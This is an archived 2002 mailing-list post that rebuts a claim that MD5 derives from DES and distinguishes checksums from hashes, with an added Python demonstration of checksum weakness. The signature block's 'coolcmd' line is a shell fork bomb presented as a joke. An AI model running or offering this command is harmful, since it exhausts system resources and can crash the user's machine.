On Friday 16 August 2002 17:47, Bob the Builder wrote:
> The md5 hashing algorithm is based on the DES encryption algorithm.

I'm sorry, could you prove this claim or is this just something you've 'heard somewhere'? I see no similarity.

rfc1186 for MD4, BTW, which MD5 was based on. A (very) quick search of rfc1186 reveals no mention of DES.

Other information for the topic:
UNIX traditionally uses DES to hash passwords, but some flavours let you use MD5 instead. OpenBSD uses blowfish by default. I will not argue the security of blowfish as a hashing algorithm based on it being in OpenBSD since I don't buy the "OpenBSD is safer" thing[1]. BUT.... in "Applied Cryptography" (page 336 in my copy[2]) you'll see Bruce Schneier[3] saying that it's not suitable for one-way hash functions. He doesn't say clearly why.

> The point of using md5 is about obtaining a checksum for a given piece of
> data where it is difficult (computationally infeasible) to produce a second
> piece of data that results in the same checksum.

Hmm, I don't know for sure, but isn't 'checksum' the wrong word to use? Checksums are used to detect errors in transmission, not malicious alterations. Examples of such are the normal checksums in IP packets which IIRC are based on polynomial division or something.[4] And malicious alteration of data without altering the checksum is supposedly trivial.

I think hash value, or hash output, is more correct. But I could be completely wrong on this one.

[1] It's a big and OT issue.
[2] MD5 is on _4_36, spooky.
[3] Who is the guy that designed blowfish
[4] I have known the theory behind CRC :).

> example the md5sum on unix usually uses a DES key that is just a string of
> zeroes.

I really think you're confusing /etc/passwd with its different choices of hashing functions.
---------
typedef struct me_s {
  char name[]      = { "Thomas Habets" };
  char email[]     = { "thomasat_private" };
  char kernel[]    = { "Linux 2.4" };
  char *pgpKey[]   = { "http://darkface.pp.se/~thompa/pubkey.txt" };
  char pgp[]       = { "A8A3 D1DD 4AE0 8467 7FDE  0945 286A E90A AD48 E854" };
  char coolcmd[]   = { "echo '. ./_&. ./_'>_;. ./_" };
} me_t;
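
The checksum-versus-hash distinction raised in the message above, as an added example that is not part of the original post: the IPv4 header checksum (RFC 1071) is a ones' complement sum of 16-bit words, so reordering words leaves it unchanged, and CRC-32 is linear over XOR, while an MD5 digest of the reordered data differs. The sample record and the helper names are constructed for illustration.

```python
import hashlib
import zlib


def internet_checksum(data: bytes) -> int:
    """RFC 1071: ones' complement of the ones' complement sum of 16-bit words."""
    if len(data) % 2:
        data += b"\x00"  # pad odd-length input with a zero byte
    total = 0
    for i in range(0, len(data), 2):
        total += (data[i] << 8) | data[i + 1]
        total = (total & 0xFFFF) + (total >> 16)  # fold the carry back in
    return ~total & 0xFFFF


def swap_words(data: bytes, i: int, j: int) -> bytes:
    """Return data with 16-bit words i and j exchanged."""
    words = [data[k:k + 2] for k in range(0, len(data), 2)]
    words[i], words[j] = words[j], words[i]
    return b"".join(words)


def md5_hex(data: bytes) -> str:
    return hashlib.md5(data).hexdigest()


def crc32_is_linear(a: bytes, b: bytes, c: bytes) -> bool:
    """For equal-length inputs, crc(a^b^c) == crc(a)^crc(b)^crc(c)."""
    mixed = bytes(x ^ y ^ z for x, y, z in zip(a, b, c))
    return zlib.crc32(mixed) == zlib.crc32(a) ^ zlib.crc32(b) ^ zlib.crc32(c)


# Constructed sample record (not from the original message).
ORIGINAL = b"pay=0100;to=0042"
REORDERED = swap_words(ORIGINAL, 2, 7)  # b"pay=4200;to=0001"

if __name__ == "__main__":
    for label, blob in (("original", ORIGINAL), ("reordered", REORDERED)):
        print(f"{label:9} {blob!r} "
              f"inet={internet_checksum(blob):#06x} md5={md5_hex(blob)}")
    print("crc32 linear over XOR:",
          crc32_is_linear(ORIGINAL, REORDERED, b"\x00" * len(ORIGINAL)))
```

Both properties are structural: they hold for any input, which is why these functions detect transmission errors but give no assurance against deliberate modification.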
This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 03:16:36 PDT